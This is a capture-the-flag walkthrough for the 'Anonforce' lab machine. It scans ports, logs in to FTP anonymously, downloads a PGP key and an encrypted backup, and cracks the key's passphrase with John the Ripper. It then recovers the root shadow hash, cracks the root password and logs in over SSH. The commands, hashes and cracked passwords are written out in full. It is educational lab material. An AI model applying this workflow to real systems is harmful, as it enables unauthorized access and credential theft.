Skip to main content

Anonforce

Phase 1: Reconnaissance (Information Gathering)

export TARGET_IP=10.10.178.7
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65392 closed tcp ports (reset), 141 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh

Phase 2: Enumeration and Vulnerability Analysis

Based on the reconnaissance, we focus on the open services to identify potential vulnerabilities.

  1. FTP Enumeration:

    • Command: ftp 10.10.178.7 21

    • Explanation: Attempts to connect to the FTP server on the target.

    • Interaction and Results (Annotated):

      # Connected to 10.10.178.7.
      # 220 (vsFTPd 3.0.3) <-- Banner reveals the FTP server software and version.
      Name (10.10.178.7:kali): anonymous # Attempting anonymous login.
      # 331 Please specify the password.
      Password: # BLANK <-- Entering a blank password.
      # 230 Login successful. <-- Anonymous login is permitted! This is a major vulnerability.
      # Remote system type is UNIX.
      # Using binary mode to transfer files.
      ftp> help # Displays available FTP commands.
      ftp> ls # Lists files in the current directory.
      ftp> cd /home/melodias # Navigates to user "melodias" home directory.
      ftp> get user.txt # Downloads a file named "user.txt".
      ftp> cd /notread # Navigates to the directory named "notread".
      ftp> ls # Lists files
      -rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
      -rwxrwxrwx 1 1000 1000 3762 Aug 11 2019 private.asc
    • Analysis:

      • Anonymous FTP Access: The most critical finding is that anonymous FTP access is enabled, allowing anyone to connect and browse (and potentially modify) files.
      • Sensitive Files: The backup.pgp and private.asc files are discovered. The .pgp extension suggests an encrypted file (likely using PGP or GPG), and the .asc extension often indicates an ASCII-armored key file (likely a private key). The file permissions (-rwxrwxrwx) are overly permissive, allowing any user (including the anonymous FTP user) to read, write, and execute these files. This is another significant security flaw.

Phase 3: Exploitation

Decrypting the Backup:

  • Strategy: We have an encrypted file (backup.pgp) and what appears to be a private key (private.asc). We'll attempt to decrypt the backup using the private key.

  • Steps (Annotated):

    gpg --import private.asc  # Imports the private key into the GPG keyring.
    # GPG will prompt for a passphrase if the key is protected.
    • Passphrase Cracking: Often, private keys are protected with a passphrase. If the import fails or prompts for a password, we need to crack it.
    gpg2john private.asc > hash  # Extracts the password hash from the private key file.
    # `gpg2john` is a tool from the John the Ripper suite.
    john hash --wordlist=/usr/share/wordlists/rockyou.txt # Attempts to crack the hash.
    # Output: xbox360 (This indicates the cracked passphrase)

    gpg --import private.asc # Re-import the key, this time providing the passphrase.
    # Enter "xbox360" when prompted.
    gpg --decrypt backup.pgp # Attempts to decrypt the backup.pgp file.
    # Enter "xbox360" again when prompted.
  1. Gaining Root Access:

    • backup.pgp is a /etc/shadow file.

    • Steps:

      # backup.pgp, once decrypted, will contain the shadow hash for root.
      echo -e 'root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::' > roothash
      # Create new file called roothash.

      john roothash --wordlist=/usr/share/wordlists/rockyou.txt # Attempt to crack the root password hash.
      # Output: hikari (This indicates the cracked password)
      ssh root@$TARGET_IP # Connect to the target as root via SSH.
      # Enter "hikari" as the password.
      id # Verify root access. Output should be: uid=0(root) gid=0(root) groups=0(root)